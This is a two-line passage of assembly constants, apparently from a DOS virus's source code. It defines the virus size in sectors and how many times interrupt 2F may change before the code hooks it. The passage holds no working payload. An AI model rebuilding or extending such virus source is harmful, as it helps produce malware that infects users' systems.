VIR_SIZE        EQU     4       ;size of virus, in sectors
CHANGES         EQU     2       ;times to allow int 2F to change before hooking it
